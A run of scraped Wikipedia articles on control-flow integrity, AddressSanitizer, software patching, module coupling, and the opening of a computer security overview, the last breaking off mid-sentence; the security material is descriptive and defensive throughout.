Control-flow integrity(CFI) is a general term forcomputer securitytechniques that prevent a wide variety ofmalwareattacks from redirecting the flow of execution (thecontrol flow) of a program. A computer program commonly changes its control flow to make decisions and use different parts of the code. Such transfers may bedirect, in that the target address is written in the code itself, orindirect, in that the target address itself is a variable in memory or a CPU register. In a typical function call, the program performs a direct call, but returns to the caller function using the stack – an indirectbackward-edgetransfer. When afunction pointeris called, such as from avirtual table, we say there is an indirectforward-edgetransfer.[1][2] Attackers seek to inject code into a program to make use of its privileges or to extract data from its memory space. Before executable code was commonly made read-only, an attacker could arbitrarily change the code as it is run, targeting direct transfers or even do with no transfers at all. AfterW^Xbecame widespread, an attacker wants to instead redirect execution to a separate, unprotected area containing the code to be run, making use of indirect transfers: one could overwrite the virtual table for a forward-edge attack or change the call stack for a backward-edge attack (return-oriented programming). CFI is designed to protect indirect transfers from going to unintended locations.[1] Associated techniques include code-pointer separation (CPS), code-pointer integrity (CPI),stack canaries,shadow stacks, andvtablepointer verification.[3][4][5]These protections can be classified into eithercoarse-grainedorfine-grainedbased on the number of targets restricted. A coarse-grained forward-edge CFI implementation, could, for example, restrict the set of indirect call targets to any function that may be indirectly called in the program, while a fine-grained one would restrict each indirect call site to functions that have the same type as the function to be called. Similarly, for a backward edge scheme protecting returns, a coarse-grained implementation would only allow the procedure to return to a function of the same type (of which there could be many, especially for common prototypes), while a fine-grained one would enforce precise return matching (so it can return only to the function that called it). Related implementations are available inClang(LLVM in general),[6]Microsoft's Control Flow Guard[7][8][9]and Return Flow Guard,[10]Google's Indirect Function-Call Checks[11]and Reuse Attack Protector (RAP).[12][13] LLVM/Clang provides a "CFI" option that works in the forward edge by checking for errors invirtual tablesand type casts. It depends onlink-time optimization(LTO) to know what functions are supposed to be called in normal cases.[14]There is a separate "shadow call stack" scheme that defends on the backward edge by checking for call stack modifications, available only for aarch64.[15] Google has shippedAndroidwith theLinux kernelcompiled by Clang withlink-time optimization(LTO) and CFI since 2018.[16]SCS is available for Linux kernel as an option, including on Android.[17] Intel Control-flow Enforcement Technology (CET) detects compromises to control flow integrity with ashadow stack(SS) andindirect branch tracking(IBT).[18][19] The kernel must map a region of memory for the shadow stack not writable to user space programs except by special instructions. The shadow stack stores a copy of the return address of each CALL. On a RET, the processor checks if the return address stored in the normal stack and shadow stack are equal. If the addresses are not equal, the processor generates an INT #21 (Control Flow Protection Fault). Indirect branch tracking detects indirect JMP or CALL instructions to unauthorized targets. It is implemented by adding a new internal state machine in the processor. The behavior of indirect JMP and CALL instructions is changed so that they switch the state machine from IDLE to WAIT_FOR_ENDBRANCH. In the WAIT_FOR_ENDBRANCH state, the next instruction to be executed is required to be the new ENDBRANCH instruction (ENDBR32 in 32-bit mode or ENDBR64 in 64-bit mode), which changes the internal state machine from WAIT_FOR_ENDBRANCH back to IDLE. Thus every authorized target of an indirect JMP or CALL must begin with ENDBRANCH. If the processor is in a WAIT_FOR_ENDBRANCH state (meaning, the previous instruction was an indirect JMP or CALL), and the next instruction is not an ENDBRANCH instruction, the processor generates an INT #21 (Control Flow Protection Fault). On processors not supporting CET indirect branch tracking, ENDBRANCH instructions are interpreted as NOPs and have no effect. Control Flow Guard (CFG) was first released forWindows 8.1Update 3 (KB3000850) in November 2014. Developers can add CFG to their programs by adding the/guard:cflinker flag before program linking in Visual Studio 2015 or newer.[20] As ofWindows 10 Creators Update(Windows 10 version 1703), the Windows kernel is compiled with CFG.[21]The Windows kernel usesHyper-Vto prevent malicious kernel code from overwriting the CFG bitmap.[22] CFG operates by creating a per-processbitmap, where a set bit indicates that the address is a valid destination. Before performing each indirect function call, the application checks if the destination address is in the bitmap. If the destination address is not in the bitmap, the program terminates.[20]This makes it more difficult for an attacker to exploit ause-after-freeby replacing an object's contents and then using an indirect function call to execute a payload.[23] For all protected indirect function calls, the_guard_check_icallfunction is called, which performs the following steps:[24] There are several generic techniques for bypassing CFG: eXtended Flow Guard (XFG) has not been officially released yet, but is available in the Windows Insider preview and was publicly presented at Bluehat Shanghai in 2019.[29] XFG extends CFG by validating function call signatures to ensure that indirect function calls are only to the subset of functions with the same signature. Function call signature validation is implemented by adding instructions to store the target function's hash in register r10 immediately prior to the indirect call and storing the calculated function hash in the memory immediately preceding the target address's code. When the indirect call is made, the XFG validation function compares the value in r10 to the target function's stored hash.[30][31]
https://en.wikipedia.org/wiki/Control_flow_integrity
Acode sanitizeris a programming tool that detectsbugsin the form of undefined or suspicious behavior by acompilerinsertinginstrumentationcode at runtime. The class of tools was first introduced by Google'sAddressSanitizer(orASan) of 2012, which uses directly mappedshadow memoryto detectmemory corruptionsuch asbuffer overflowsor accesses to adangling pointer(use-after-free). Google's ASan, introduced in 2012, uses ashadow memoryscheme to detect memory bugs. It is available in: On average, the instrumentation increases processing time by about 73% and memory usage by 240%.[5]There is a hardware-accelerated ASan called HWAsan available for AArch64 and (in a limited fashion) x86_64.[6] AddressSanitizer does not detect any uninitialized memory reads (but this is detected byMemorySanitizer[7]), and only detects some use-after-return bugs.[8]It is also not capable of detecting all arbitrary memory corruption bugs, nor all arbitrary write bugs due to integer underflow/overflows (when the integer with undefined behavior is used to calculate memory address offsets). Adjacent buffers in structs and classes are not protected from overflow, in part to prevent breaking backwards compatibility.[9] TheKernelAddressSanitizer(KASan) detects dynamic memory errors in the Linux kernel.[10]Kernel instrumentation requires a special feature in the compiler supplying the-fsanitize=kernel-addresscommand line option, since kernels do not use the same address space as normal programs.[11][12] KASan is also available for use with Windows kernel drivers beginning in Windows 11 22H2 and above.[13]Similarly to Linux, compiling a Windows driver with KASAN requires passing the/fsanitize=kernel-addresscommand line option to the MSVC compiler. Google also producedLeakSanitizer(LSan,memory leaks),ThreadSanitizer(TSan,data racesanddeadlocks),MemorySanitizer(MSan,uninitialized memory), andUndefinedBehaviorSanitizer(UBSan,undefined behaviors, with fine-grained control).[14]These tools are generally available in Clang/LLVM and GCC.[15][16][17]Similar to KASan, there are kernel-specific versions of LSan, MSan, TSan, as well as completely original kernel sanitizers such as KFENCE and KCSan.[18] Additional sanitizer tools (grouped by compilers under-fsanitizeor a similar flag) include:[15][16][17] A code sanitizer detects suspicious behavior as the program runs. One common way to use a sanitizer is to combine it withfuzzing, which generates inputs likely to trigger bugs.[21] ChromiumandFirefoxdevelopers are active users of AddressSanitizer;[21][22]the tool has found hundreds of bugs in these web browsers.[23]A number of bugs were found inFFmpeg[24]andFreeType.[25]TheLinux kernelhas enabled the AddressSanitizer for thex86-64architecture as of Linux version 4.0.
https://en.wikipedia.org/wiki/AddressSanitizer
Apatchisdatathat is intended to be used to modify an existing software resource such as aprogramor afile, often to fixbugsandsecurity vulnerabilities.[1][2]A patch may be created to improve functionality,usability, orperformance. A patch is typically provided by a vendor for updating the software that they provide. A patch may be created manually, but commonly it is created via a tool that compares two versions of the resource and generates data that can be used to transform one to the other. Typically, a patch needs to be applied to the specific version of the resource it is intended to modify, although there are exceptions. Some patching tools can detect the version of the existing resource and apply the appropriate patch, even if it supports multiple versions. As more patches are released, their cumulative size can grow significantly, sometimes exceeding the size of the resource itself. To manage this, the number of supported versions may be limited, or a complete copy of the resource might be provided instead. Patching allows for modifying acompiled(machine language) program when thesource codeis unavailable. This demands a thorough understanding of the inner workings of the compiled code, which is challenging without access to the source code. Patching also allows for making changes to a program without rebuilding it from source. For small changes, it can be more economical to distribute a patch than to distribute the complete resource. Although often intended to fix problems, a poorly designed patch can introduce new problems (seesoftware regressions). In some cases updates may knowingly break the functionality or disable a device, for instance, by removing components for which the update provider is no longer licensed.Patch managementis a part oflifecycle management, and is the process of using a strategy and plan of what patches should be applied to which systems at a specified time. Typically, a patch is applied viaprogrammed controltocomputer storageso that it is permanent. In some cases a patch is applied by aprogrammervia a tool such as adebuggertocomputer memoryin which case the change is lost when the resource is reloaded from storage. Patches forproprietary softwareare typically distributed asexecutable filesinstead ofsource code. When executed these files load a program into memory which manages the installation of the patch code into the target program(s) on disk. Patches for other software are typically distributed as data files containing the patch code. These are read by a patchutility programwhich performs the installation. This utility modifies the target program's executable file—the program'smachine code—typically by overwriting its bytes with bytes representing the new patch code. If the new code will fit in the space (number of bytes) occupied by the old code, it may be put in place by overwriting directly over the old code. This is called an inline patch. If the new code is bigger than the old code, the patch utility will append load record(s) containing the new code to the object file of the target program being patched. When the patched program is run, execution is directed to the new code with branch instructions (jumps or calls) patched over the place in the old code where the new code is needed. On early 8-bit microcomputers, for example the Radio ShackTRS-80, the operating system includes a PATCH/CMD utility which accepts patch data from a text file and applies the fixes to the target program's executable binary file(s). The patch code must have place(s) in memory to be executed at runtime. Inline patches are no difficulty, but when additional memory space is needed the programmer must improvise. Naturally if the patch programmer is the one who first created the code to be patched, this is easier. Savvy programmers plan in advance for this need by reserving memory for later expansion, left unused when producing their final iteration. Other programmers not involved with the original implementation, seeking to incorporate changes at a later time, must find or make space for any additional bytes needed. The most fortunate possible circumstance for this is when the routine to be patched is a distinct module. In this case the patch programmer need merely adjust the pointers or length indicators that signal to other system components the space occupied by the module; he is then free to populate this memory space with his expanded patch code. If the routine to be patched does not exist as a distinct memory module, the programmer must find ways to shrink the routine to make enough room for the expanded patch code. Typical tactics include shortening code by finding more efficient sequences of instructions (or by redesigning with more efficient algorithms), compacting message strings and other data areas, externalizing program functions to mass storage (such as disk overlays), or removal of program features deemed less important than the changes to be installed with the patch. Small in-memory machine code patches can be manually applied with the system debug utility, such asCP/M's DDT orMS-DOS's DEBUG debuggers. Programmers working in interpretedBASICoften used the POKE command to alter the functionality of a system service routine or the interpreter itself. Patches can also circulate in the form of source code modifications. In this case, the patches usually consist of textual differences between two source code files, called "diffs". These types of patches commonly come out ofopen-source software projects. In these cases, developers expect users to compile the new or changed files themselves. Because the word "patch" carries the connotation of a small fix, large fixes may use different nomenclature. Bulky patches or patches that significantly change a program may circulate as "service packs" or as "software updates".Microsoft Windows NTand its successors (includingWindows 2000,Windows XP,Windows VistaandWindows 7) use the "service pack" terminology.[3]Historically,IBMused the terms "FixPaks" and "Corrective Service Diskette" to refer to these updates.[4] Historically, software suppliers distributed patches onpaper tapeor onpunched cards, expecting the recipient to cut out the indicated part of the original tape (or deck), and patch in (hence the name) the replacement segment. Later patch distributions used magnetic tape. Then, after the invention of removable disk drives, patches came from the software developer via adiskor, later,CD-ROMviamail. With widely availableInternetaccess,downloadingpatches from the developer'sweb siteor through automated software updates became often available to the end-users. Starting with Apple'sMac OS 9and Microsoft'sWindows ME, PC operating systems gained the ability to get automatic software updates via the Internet. Computer programs can often coordinate patches to update a target program. Automation simplifies the end-user's task – they need only to execute an update program, whereupon that program makes sure that updating the target takes place completely and correctly. Service packs forMicrosoft Windows NTand its successors and for many commercial software products adopt such automated strategies. Some programs can update themselves via theInternetwith very little or no intervention on the part of users. The maintenance ofserversoftware and ofoperating systemsoften takes place in this manner. In situations where system administrators control a number of computers, this sort of automation helps to maintain consistency. The application of security patches commonly occurs in this manner. With the advent of larger storage media and higher Internet bandwidth, it became common to replace entire files (or even all of a program's files) rather than modifying existing files, especially for smaller programs. The size of patches may vary from a fewbytesto hundreds ofmegabytes; thus, more significant changes imply a larger size, though this also depends on whether the patch includes entire files or only the changed portion(s) of files. In particular, patches can become quite large when the changes add or replace non-program data, such as graphics and sounds files. Such situations commonly occur in the patching ofcomputer games. Compared with the initial installation of software, patches usually do not take long to apply. In the case ofoperating systemsandcomputer serversoftware, patches have the particularly important role of fixing security holes. Some critical patches involve issues with drivers.[5]Patches may require prior application of other patches, or may require prior or concurrent updates of several independent software components. To facilitate updates, operating systems often provide automatic or semi-automatic updating facilities. Completely automatic updates have not succeeded in gaining widespread popularity in corporate computing environments, partly because of the aforementioned glitches, but also because administrators fear that software companies may gain unlimited control over their computers.[citation needed]Package management systemscan offer various degrees of patch automation. Usage of completely automatic updates has become far more widespread in the consumer market, due largely[citation needed]to the fact thatMicrosoft Windowsadded support for them[when?], andService Pack 2 of Windows XP(available in 2004) enabled them by default. Cautious users, particularly system administrators, tend to put off applying patches until they can verify the stability of the fixes. Microsoft(W)SUSsupports this. In the cases of large patches or of significant changes, distributors often limit availability of patches to qualified developers as abeta test. Applying patches tofirmwareposes special challenges, as it often involves the provisioning of totally new firmware images, rather than applying only the differences from the previous version. The patch usually consists of a firmware image in form of binary data, together with a supplier-provided special program that replaces the previous version with the new version; amotherboardBIOSupdate is an example of a common firmware patch. Any unexpected error or interruption during the update, such as a power outage, may render the motherboard unusable. It is possible for motherboard manufacturers to put safeguards in place to prevent serious damage; for example, the update procedure could make and keep a backup of the firmware to use in case it determines that the primary copy is corrupt (usually through the use of achecksum, such as aCRC). Video gamesreceive patches to fix compatibility problems after their initial release just like any other software, but they can also be applied to change game rules oralgorithms. These patches may be prompted by the discovery ofexploitsin themultiplayergame experience that can be used to gain unfair advantages over other players. Extra features and gameplay tweaks can often be added. These kinds of patches are common infirst-person shooterswithmultiplayercapability, and inMMORPGs, which are typically very complex with large amounts of content, almost always rely heavily on patches following the initial release, where patches sometimes add new content and abilities available to players. Because the balance and fairness for all players of an MMORPG can be severely corrupted within a short amount of time by an exploit, servers of an MMORPG are sometimes taken down with short notice in order to apply a critical patch with a fix. Companies sometimes release games knowing that they have bugs.Computer Gaming World'sScorpiain 1994 denounced "companies—too numerous to mention—who release shoddy product knowing they can get by with patches and upgrades, and who make'pay-testers of their customers".[6] Patches sometimes become mandatory to fix problems withlibrariesor with portions ofsource codefor programs in frequent use or in maintenance. This commonly occurs on very large-scale software projects, but rarely in small-scale development. In open-source projects, the authors commonly receive patches or many people publish patches that fix particular problems or add certain functionality, like support for local languages outside the project's locale. In an example from the early development of theLinux kernel(noted for publishing its complete source code),Linus Torvalds, the original author, received hundreds of thousands of patches from manyprogrammersto apply against his original version. TheApache HTTP Serveroriginally evolved as a number of patches thatBrian Behlendorfcollated to improveNCSA HTTPd, hence a name that implies that it is a collection of patches ("a patchy server"). The FAQ on the project's official site states that the name 'Apache' was chosen from respect for the Native American Indian tribe ofApache. However, the 'a patchy server' explanation was initially given on the project's website.[7] A hotfix or Quick Fix Engineering update (QFE update) is a single, cumulative package that includes information (often in the form of one or more files) that is used to address a problem in a software product (i.e., a software bug). Typically, hotfixes are made to address a specific customer situation.Microsoftonce used this term but has stopped in favor of new terminology: General Distribution Release (GDR) and Limited Distribution Release (LDR).Blizzard Entertainment, however, defines a hotfix as "a change made to the game deemed critical enough that it cannot be held off until a regular content patch". A point release is aminor releaseof a software project, especially one intended to fix bugs or do small cleanups rather than add significantfeatures. Often, there are too many bugs to be fixed in a single major or minor release, creating a need for a point release. Program temporary fix or Product temporary fix (PTF), depending on date, is the standardIBMterminology for a single bug fix, or group of fixes, distributed in a form ready to install for customers. A PTF was sometimes referred to as a “ZAP”.[8]Customers sometime explain the acronym in a tongue-in-cheek manner aspermanent temporary fixor more practicallyprobably this fixes, because they have the option to make the PTF a permanent part of the operating system if the patch fixes the problem. Asecurity patchis a change applied to an asset to correct the weakness described by a vulnerability. This corrective action will prevent successful exploitation and remove or mitigate a threat's capability to exploit a specific vulnerability in an asset. Patch management is a part ofvulnerability management– the cyclical practice of identifying, classifying, remediating, and mitigating vulnerabilities. Security patches are the primary method of fixing security vulnerabilities in software. Currently Microsoft releases its security patches once a month ("patch Tuesday"), and other operating systems and software projects have security teams dedicated to releasing the most reliable software patches as soon after a vulnerability announcement as possible. Security patches are closely tied toresponsible disclosure. These security patches are critical to ensure that business process does not get affected. In 2017, companies were struck by a ransomware calledWannaCrywhich encrypts files in certain versions ofMicrosoft Windowsand demands a ransom via BitCoin. In response to this, Microsoft released a patch which stops the ransomware from running. A service pack or SP or a feature pack (FP) comprises a collection of updates, fixes, or enhancements to a software program delivered in the form of a single installable package. Companies often release a service pack when the number of individual patches to a given program reaches a certain (arbitrary) limit, or the software release has shown to be stabilized with a limited number of remaining issues based on users' feedback and bug tracking such asBugzilla. In large software applications such as office suites, operating systems, database software, or network management, it is not uncommon to have a service pack issued within the first year or two of a product's release. Installing a service pack is easier and less error-prone than installing many individual patches, even more so when updating multiple computers over a network, where service packs are common. An unofficial patch is a patch for a program written by a third party instead of the originaldeveloper. Similar to an ordinary patch, it alleviatesbugsor shortcomings. Examples are security fixes by security specialists when an official patch by the software producers itself takes too long.[9][10]Other examples are unofficial patches created by thegame communityof avideo gamewhich became unsupported.[11][12] Monkey patchingmeans extending or modifying a program locally (affecting only the running instance of the program). Hot patching, also known aslive patchingordynamic software updating, is the application of patches without shutting down and restarting the system or the program concerned. This addresses problems related to unavailability of service provided by the system or the program.[13]Method can be used to updateLinux kernelwithout stopping the system.[14][15]A patch that can be applied in this way is called ahot patchor alive patch. This is becoming a common practice in the mobile app space.[16]Companies likeRollout.iousemethod swizzlingto deliver hot patches to the iOS ecosystem.[17]Another method for hot-patching iOS apps is JSPatch.[18] Cloud providers often use hot patching to avoid downtime for customers when updating underlying infrastructure.[19] In computing, slipstreaming is the act of integrating patches (includingservice packs) into theinstallationfiles of their original app, so that the result allows a direct installation of the updated app.[20][21] The nature of slipstreaming means that it involves an initial outlay of time and work, but can save a lot of time (and, by extension, money) in the long term. This is especially significant for administrators that are tasked with managing a large number of computers, where typical practice for installing an operating system on each computer would be to use the original media and then update each computer after the installation was complete. This would take a lot more time than starting with a more up-to-date (slipstreamed) source, and needing to download and install the few updates not included in the slipstreamed source. However, not all patches can be applied in this fashion and one disadvantage is that if it is discovered that a certain patch is responsible for later problems, said patch cannot be removed without using an original, non-slipstreamed installation source. Software update systems allow for updates to be managed by users and software developers. In the2017 Petya cyberpandemic, the financial software "MeDoc"'s update system is said to have been compromised to spreadmalwarevia its updates.[22][23]On the Tor Blog, cybersecurity expert Mike Perry states thatdeterministic, distributed builds are likely the only way to defend against malware that attacks the software development andbuildprocesses to infect millions of machines in a single, officially signed, instantaneous update.[24]Update managers also allow for security updates to be applied quickly and widely. Update managers ofLinuxsuch asSynapticallow users to update all software installed on their machine. Applications like Synaptic use cryptographic checksums to verify source/local files before they are applied to ensure fidelity against malware.[25][26] Somehackermay compromise legitimate software update channel and injectmalicious code.[27]
https://en.wikipedia.org/wiki/Software_update
Insoftware engineering,couplingis the degree of interdependence between softwaremodules, a measure of how closely connected two routines or modules are,[1]and the strength of the relationships between modules.[2]Coupling is not binary but multi-dimensional.[3] Coupling is usually contrasted withcohesion.Low couplingoften correlates with high cohesion, and vice versa. Low coupling is often thought to be a sign of a well-structuredcomputer systemand a good design, and when combined with high cohesion, supports the general goals of highreadabilityandmaintainability.[citation needed] Thesoftware quality metricsof coupling and cohesion were invented byLarry Constantinein the late 1960s as part of astructured design, based on characteristics of “good” programming practices that reduced maintenance and modification costs. Structured design, including cohesion and coupling, were published in the articleStevens, Myers & Constantine(1974)[4]and the bookYourdon & Constantine(1979),[5]and the latter subsequently became standard terms. Coupling can be "low" (also "loose" and "weak") or "high" (also "tight" and "strong"). Some types of coupling, in order of highest to lowest coupling, are as follows: A module here refers to a subroutine of any kind, i.e. a set of one or more statements having a name and preferably its own set of variable names. In recent work various other coupling concepts have been investigated and used as indicators for different modularization principles used in practice.[7] The goal of defining and measuring this type of coupling is to provide a run-time evaluation of a software system. It has been argued that static coupling metrics lose precision when dealing with an intensive use of dynamic binding or inheritance.[8]In the attempt to solve this issue, dynamic coupling measures have been taken into account. This kind of a coupling metric considers the conceptual similarities between software entities using, for example, comments and identifiers and relying on techniques such aslatent semantic indexing(LSI). Logical coupling (or evolutionary coupling or change coupling) analysis exploits the release history of a software system to find change patterns among modules or classes: e.g., entities that are likely to be changed together or sequences of changes (a change in a class A is always followed by a change in a class B). According to Gregor Hohpe, coupling is multi-dimensional:[3] Tightly coupled systems tend to exhibit the following developmental characteristics, which are often seen as disadvantages: Whether loosely or tightly coupled, a system's performance is often reduced by message and parameter creation, transmission, translation (e.g. marshaling) and message interpretation (which might be a reference to a string, array or data structure), which require less overhead than creating a complicated message such as aSOAPmessage. Longer messages require more CPU and memory to produce. To optimize runtime performance, message length must be minimized and message meaning must be maximized. One approach to decreasing coupling isfunctional design, which seeks to limit the responsibilities of modules along functionality. Coupling increases between two classesAandBif: Low coupling refers to a relationship in which one module interacts with another module through a simple and stable interface and does not need to be concerned with the other module's internal implementation (seeInformation Hiding). Systems such asCORBAorCOMallow objects to communicate with each other without having to know anything about the other object's implementation. Both of these systems even allow for objects to communicate with objects written in other languages. Coupling describes the degree and nature of dependency between software components, focusing on what they share (e.g., data, control flow, technology) and how tightly they are bound. It evaluates two key dimensions: strength, which measures how difficult it is to change the dependency, and scope (or visibility), which indicates how widely the dependency is exposed across modules or boundaries. Traditional coupling types typically include content coupling, common coupling, control coupling, stamp coupling, external coupling, and data coupling.[9][10][11] Connascence, introduced by Meilir Page-Jones, provides a systematic framework for analyzing and measuring coupling dependencies. It evaluates dependencies based on three dimensions: strength, which measures the effort required to refactor or modify the dependency; locality, which considers how physically or logically close dependent components are in the codebase; and degree, which measures how many components are affected by the dependency. Connascence can be categorized into static (detectable at compile-time) and dynamic (detectable at runtime) forms. Static connascence refers to compile-time dependencies, such as method signatures, while dynamic connascence refers to runtime dependencies, which can manifest in forms like connascence of timing, values, or algorithm.[9][10][11] Each coupling flavor can exhibit multiple types of connascence, a specific type, or, in rare cases, none at all, depending on how the dependency is implemented. Common types of connascence include connascence of name, type, position, and meaning. Certain coupling types naturally align with specific connascence types; for example, data coupling often involves connascence of name or type. However, not every combination of coupling and connascence is practically meaningful. Dependencies relying on parameter order in a method signature demonstrate connascence of position, which is fragile and difficult to refactor because reordering parameters breaks the interface. In contrast, connascence of name, which relies on field or parameter names, is generally more resilient to change. Connascence types themselves exhibit a natural hierarchy of strength, with connascence of name typically considered weaker than connascence of meaning.[9][10][11] Dependencies spanning module boundaries or distributed systems typically have higher coordination costs, increasing the difficulty of refactoring and propagating changes across distant boundaries. Modern practices, such as dependency injection and interface-based programming, are often employed to reduce coupling strength and improve the maintainability of dependencies.[9][10][11] While coupling identifies what is shared between components, connascence evaluates how those dependencies behave, how changes propagate, and how difficult they are to refactor. Strength, locality, and degree are interrelated; dependencies with high strength, wide scope, and spanning distant boundaries are significantly harder to refactor and maintain. Together, coupling provides a high-level overview of dependency relationships, while connascence offers a granular framework for analyzing dependency strength, locality, degree, and resilience to change, supporting the design of maintainable and robust systems.[9][10][11] Coupling andcohesionare terms which occur together very frequently. Coupling refers to the interdependencies between modules, while cohesion describes how related the functions within a single module are. Low cohesion implies that a given module performs tasks which are not very related to each other and hence can create problems as the module becomes large. Coupling in Software Engineering[12]describes a version of metrics associated with this concept. For data and control flow coupling: For global coupling: For environmental coupling: Coupling(C)=1−1di+2×ci+do+2×co+gd+2×gc+w+r{\displaystyle \mathrm {Coupling} (C)=1-{\frac {1}{d_{i}+2\times c_{i}+d_{o}+2\times c_{o}+g_{d}+2\times g_{c}+w+r}}} Coupling(C)makes the value larger the more coupled the module is. This number ranges from approximately 0.67 (low coupling) to 1.0 (highly coupled) For example, if a module has only a single input and output data parameter C=1−11+0+1+0+0+0+1+0=1−13=0.67{\displaystyle C=1-{\frac {1}{1+0+1+0+0+0+1+0}}=1-{\frac {1}{3}}=0.67} If a module has 5 input and output data parameters, an equal number of control parameters, and accesses 10 items of global data, with a fan-in of 3 and a fan-out of 4, C=1−15+2×5+5+2×5+10+0+3+4=0.98{\displaystyle C=1-{\frac {1}{5+2\times 5+5+2\times 5+10+0+3+4}}=0.98}
https://en.wikipedia.org/wiki/Software_dependency
Computer security(alsocybersecurity,digital security, orinformation technology (IT) security) is a subdiscipline within the field ofinformation security. It consists of the protection ofcomputer software,systemsandnetworksfromthreatsthat can lead to unauthorized information disclosure, theft or damage tohardware,software, ordata, as well as from the disruption or misdirection of theservicesthey provide.[1][2] The significance of the field stems from the expanded reliance oncomputer systems, theInternet,[3]andwireless network standards. Its importance is further amplified by the growth ofsmart devices, includingsmartphones,televisions, and the various devices that constitute theInternet of things(IoT). Cybersecurity has emerged as one of the most significant new challenges facing the contemporary world, due to both the complexity ofinformation systemsand the societies they support. Security is particularly crucial for systems that govern large-scale systems with far-reaching physical effects, such aspower distribution,elections, andfinance.[4][5] Although many aspects of computer security involve digital security, such as electronicpasswordsandencryption,physical securitymeasures such asmetal locksare still used to prevent unauthorized tampering. IT security is not a perfect subset ofinformation security, therefore does not completely align into thesecurity convergenceschema. A vulnerability refers to a flaw in the structure, execution, functioning, or internal oversight of a computer or system that compromises its security. Most of the vulnerabilities that have been discovered are documented in theCommon Vulnerabilities and Exposures(CVE) database.[6]Anexploitablevulnerability is one for which at least one workingattackorexploitexists.[7]Actors maliciously seeking vulnerabilities are known asthreats. Vulnerabilities can be researched, reverse-engineered, hunted, or exploited usingautomated toolsor customized scripts.[8][9] Various people or parties are vulnerable to cyber attacks; however, different groups are likely to experience different types of attacks more than others.[10] In April 2023, theUnited KingdomDepartment for Science, Innovation & Technology released a report on cyber attacks over the previous 12 months.[11]They surveyed 2,263 UK businesses, 1,174 UK registered charities, and 554 education institutions. The research found that "32% of businesses and 24% of charities overall recall any breaches or attacks from the last 12 months." These figures were much higher for "medium businesses (59%), large businesses (69%), and high-income charities with £500,000 or more in annual income (56%)."[11]Yet, although medium or large businesses are more often the victims, since larger companies have generally improved their security over the last decade,small and midsize businesses(SMBs) have also become increasingly vulnerable as they often "do not have advanced tools to defend the business."[10]SMBs are most likely to be affected by malware, ransomware, phishing,man-in-the-middle attacks, and Denial-of Service (DoS) Attacks.[10] Normal internet users are most likely to be affected by untargeted cyberattacks.[12]These are where attackers indiscriminately target as many devices, services, or users as possible. They do this using techniques that take advantage of the openness of the Internet. These strategies mostly includephishing,ransomware,water holingand scanning.[12] To secure a computer system, it is important to understand the attacks that can be made against it, and thesethreatscan typically be classified into one of the following categories: Abackdoorin a computer system, acryptosystem, or analgorithmis any secret method of bypassing normalauthenticationor security controls. These weaknesses may exist for many reasons, including original design or poor configuration.[13]Due to the nature of backdoors, they are of greater concern to companies and databases as opposed to individuals. Backdoors may be added by an authorized party to allow some legitimate access or by an attacker for malicious reasons.Criminalsoften usemalwareto install backdoors, giving them remote administrative access to a system.[14]Once they have access, cybercriminals can "modify files, steal personal information, install unwanted software, and even take control of the entire computer."[14] Backdoors can be difficult to detect, as they often remain hidden within the source code or system firmware intimate knowledge of theoperating systemof the computer. Denial-of-service attacks(DoS) are designed to make a machine or network resource unavailable to its intended users.[15]Attackers can deny service to individual victims, such as by deliberately entering a wrong password enough consecutive times to cause the victim's account to be locked, or they may overload the capabilities of a machine or network and block all users at once. While a network attack from a singleIP addresscan be blocked by adding a new firewall rule, many forms ofdistributed denial-of-service(DDoS) attacks are possible, where the attack comes from a large number of points. In this case, defending against these attacks is much more difficult. Such attacks can originate from thezombie computersof abotnetor from a range of other possible techniques, includingdistributed reflective denial-of-service(DRDoS), where innocent systems are fooled into sending traffic to the victim.[15]With such attacks, the amplification factor makes the attack easier for the attacker because they have to use little bandwidth themselves. To understand why attackers may carry out these attacks, see the 'attacker motivation' section. A direct-access attack is when an unauthorized user (an attacker) gains physical access to a computer, most likely to directly copy data from it or steal information.[16]Attackers may also compromise security by making operating system modifications, installingsoftware worms,keyloggers,covert listening devicesor using wireless microphones. Even when the system is protected by standard security measures, these may be bypassed by booting another operating system or tool from aCD-ROMor other bootable media.Disk encryptionand theTrusted Platform Modulestandard are designed to prevent these attacks. Direct service attackers are related in concept todirect memory attackswhich allow an attacker to gain direct access to a computer's memory.[17]The attacks "take advantage of a feature of modern computers that allows certain devices, such as external hard drives, graphics cards, or network cards, to access the computer's memory directly."[17] Eavesdroppingis the act of surreptitiously listening to a private computer conversation (communication), usually between hosts on a network. It typically occurs when a user connects to a network where traffic is not secured or encrypted and sends sensitive business data to a colleague, which, when listened to by an attacker, could be exploited.[18]Data transmitted across anopen networkallows an attacker to exploit a vulnerability and intercept it via various methods. Unlikemalware, direct-access attacks, or other forms of cyber attacks, eavesdropping attacks are unlikely to negatively affect the performance of networks or devices, making them difficult to notice.[18]In fact, "the attacker does not need to have any ongoing connection to the software at all. The attacker can insert the software onto a compromised device, perhaps by direct insertion or perhaps by a virus or other malware, and then come back some time later to retrieve any data that is found or trigger the software to send the data at some determined time."[19] Using avirtual private network(VPN), which encrypts data between two points, is one of the most common forms of protection against eavesdropping. Using the best form of encryption possible for wireless networks is best practice, as well as usingHTTPSinstead of an unencryptedHTTP.[20] Programs such asCarnivoreandNarusInSighthave been used by theFederal Bureau of Investigation(FBI) and NSA to eavesdrop on the systems ofinternet service providers. Even machines that operate as a closed system (i.e., with no contact with the outside world) can be eavesdropped upon by monitoring the faintelectromagnetictransmissions generated by the hardware.TEMPESTis a specification by the NSA referring to these attacks. Malicious software (malware) is any software code or computer program "intentionally written to harm a computer system or its users."[21]Once present on a computer, it can leak sensitive details such as personal information, business information and passwords, can give control of the system to the attacker, and can corrupt or delete data permanently.[22][23] Man-in-the-middle attacks(MITM) involve a malicious attacker trying to intercept, surveil or modify communications between two parties by spoofing one or both party's identities and injecting themselves in-between.[24]Types of MITM attacks include: Surfacing in 2017, a new class of multi-vector,[25]polymorphic[26]cyber threats combine several types of attacks and change form to avoid cybersecurity controls as they spread. Multi-vector polymorphic attacks, as the name describes, are both multi-vectored and polymorphic.[27]Firstly, they are a singular attack that involves multiple methods of attack. In this sense, they are "multi-vectored (i.e. the attack can use multiple means of propagation such as via the Web, email and applications." However, they are also multi-staged, meaning that "they can infiltrate networks and move laterally inside the network."[27]The attacks can be polymorphic, meaning that the cyberattacks used such as viruses, worms or trojans "constantly change ("morph") making it nearly impossible to detect them using signature-based defences."[27] Phishingis the attempt of acquiring sensitive information such as usernames, passwords, and credit card details directly from users by deceiving the users.[28]Phishing is typically carried out byemail spoofing,instant messaging,text message, or on aphonecall. They often direct users to enter details at a fake website whoselook and feelare almost identical to the legitimate one.[29]The fake website often asks for personal information, such as login details and 